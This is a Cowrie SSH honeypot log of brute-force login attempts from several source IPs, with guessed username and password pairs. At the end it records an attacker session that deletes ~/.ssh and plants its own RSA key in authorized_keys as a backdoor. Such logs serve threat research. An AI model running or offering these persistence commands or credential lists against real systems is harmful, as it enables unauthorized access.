{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.814714Z","src_ip":"51.250.72.176","session":"62fc3ee42104"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:41:59.007319Z","src_ip":"51.250.72.176","session":"62fc3ee42104"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:41:59.708482Z","src_ip":"103.100.209.195","session":"d0ffbe366d53"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:41:59.766735Z","src_ip":"152.32.129.236","session":"79f2de278d14"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:42:00.047444Z","src_ip":"51.250.72.176","session":"62fc3ee42104"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":45958,"dst_ip":"1.2.3.4","dst_port":22,"session":"87542976e497","protocol":"ssh","message":"New connection: 51.250.72.176:45958 (1.2.3.4:22) [session: 87542976e497]","sensor":"my-vps","timestamp":"2025-09-09T00:42:00.086783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:42:00.087521Z","src_ip":"51.250.72.176","session":"87542976e497"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:42:00.127366Z","src_ip":"51.250.72.176","session":"87542976e497"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:42:00.329990Z","src_ip":"51.250.72.176","session":"87542976e497"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:42:00.364694Z","src_ip":"51.250.72.176","session":"54169a92487e"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:42:00.370940Z","src_ip":"51.250.72.176","session":"87542976e497"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":39594,"dst_ip":"1.2.3.4","dst_port":22,"session":"361ba3251da7","protocol":"ssh","message":"New connection: 5.202.105.236:39594 (1.2.3.4:22) [session: 361ba3251da7]","sensor":"my-vps","timestamp":"2025-09-09T00:42:38.633095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:42:38.648425Z","src_ip":"5.202.105.236","session":"361ba3251da7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:42:38.800816Z","src_ip":"5.202.105.236","session":"361ba3251da7"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T00:42:39.374158Z","src_ip":"5.202.105.236","session":"361ba3251da7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:42:40.520026Z","src_ip":"5.202.105.236","session":"361ba3251da7"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":39866,"dst_ip":"1.2.3.4","dst_port":22,"session":"436d4f75b538","protocol":"ssh","message":"New connection: 43.156.132.147:39866 (1.2.3.4:22) [session: 436d4f75b538]","sensor":"my-vps","timestamp":"2025-09-09T00:42:52.514620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:42:52.515926Z","src_ip":"43.156.132.147","session":"436d4f75b538"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:42:52.776294Z","src_ip":"43.156.132.147","session":"436d4f75b538"}
{"eventid":"cowrie.login.failed","username":"superman","password":"1234567","message":"login attempt [superman/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T00:42:53.859309Z","src_ip":"43.156.132.147","session":"436d4f75b538"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:42:55.122850Z","src_ip":"43.156.132.147","session":"436d4f75b538"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":43564,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0c491bdc110","protocol":"ssh","message":"New connection: 51.250.72.176:43564 (1.2.3.4:22) [session: c0c491bdc110]","sensor":"my-vps","timestamp":"2025-09-09T00:42:58.842615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:42:58.843599Z","src_ip":"51.250.72.176","session":"c0c491bdc110"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:42:58.885255Z","src_ip":"51.250.72.176","session":"c0c491bdc110"}
{"eventid":"cowrie.login.failed","username":"testserver","password":"password123","message":"login attempt [testserver/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:42:59.082035Z","src_ip":"51.250.72.176","session":"c0c491bdc110"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:43:00.124584Z","src_ip":"51.250.72.176","session":"c0c491bdc110"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":45136,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f27bae5d8a8","protocol":"ssh","message":"New connection: 103.100.209.195:45136 (1.2.3.4:22) [session: 3f27bae5d8a8]","sensor":"my-vps","timestamp":"2025-09-09T00:43:03.207454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:43:03.208388Z","src_ip":"103.100.209.195","session":"3f27bae5d8a8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:43:03.421074Z","src_ip":"103.100.209.195","session":"3f27bae5d8a8"}
{"eventid":"cowrie.login.failed","username":"boris","password":"0","message":"login attempt [boris/0] failed","sensor":"my-vps","timestamp":"2025-09-09T00:43:04.313479Z","src_ip":"103.100.209.195","session":"3f27bae5d8a8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:43:05.534745Z","src_ip":"103.100.209.195","session":"3f27bae5d8a8"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":48000,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1ad70f9482f","protocol":"ssh","message":"New connection: 152.32.129.236:48000 (1.2.3.4:22) [session: b1ad70f9482f]","sensor":"my-vps","timestamp":"2025-09-09T00:43:16.005773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:43:16.006675Z","src_ip":"152.32.129.236","session":"b1ad70f9482f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:43:16.205429Z","src_ip":"152.32.129.236","session":"b1ad70f9482f"}
{"eventid":"cowrie.login.failed","username":"z","password":"12345678","message":"login attempt [z/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T00:43:17.040777Z","src_ip":"152.32.129.236","session":"b1ad70f9482f"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:43:18.241982Z","src_ip":"152.32.129.236","session":"b1ad70f9482f"}
{"eventid":"cowrie.session.connect","src_ip":"8.137.121.98","src_port":37324,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a3774ac9b75","protocol":"ssh","message":"New connection: 8.137.121.98:37324 (1.2.3.4:22) [session: 1a3774ac9b75]","sensor":"my-vps","timestamp":"2025-09-09T00:43:38.779208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:43:38.781143Z","src_ip":"8.137.121.98","session":"1a3774ac9b75"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T00:43:39.031521Z","src_ip":"8.137.121.98","session":"1a3774ac9b75"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:43:46.779603Z","src_ip":"8.137.121.98","session":"1a3774ac9b75"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":41704,"dst_ip":"1.2.3.4","dst_port":22,"session":"43f9214859b6","protocol":"ssh","message":"New connection: 51.250.72.176:41704 (1.2.3.4:22) [session: 43f9214859b6]","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.107391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.108582Z","src_ip":"51.250.72.176","session":"43f9214859b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.148803Z","src_ip":"51.250.72.176","session":"43f9214859b6"}
{"eventid":"cowrie.login.success","username":"root","password":"A12345","message":"login attempt [root/A12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.349788Z","src_ip":"51.250.72.176","session":"43f9214859b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:44:01.449432Z","src_ip":"51.250.72.176","session":"43f9214859b6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.450114Z","src_ip":"51.250.72.176","session":"43f9214859b6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.451158Z","src_ip":"51.250.72.176","session":"43f9214859b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.492294Z","src_ip":"51.250.72.176","session":"43f9214859b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:44:01.681764Z","src_ip":"51.250.72.176","session":"43f9214859b6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.682505Z","src_ip":"51.250.72.176","session":"43f9214859b6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.724605Z","src_ip":"51.250.72.176","session":"43f9214859b6"}
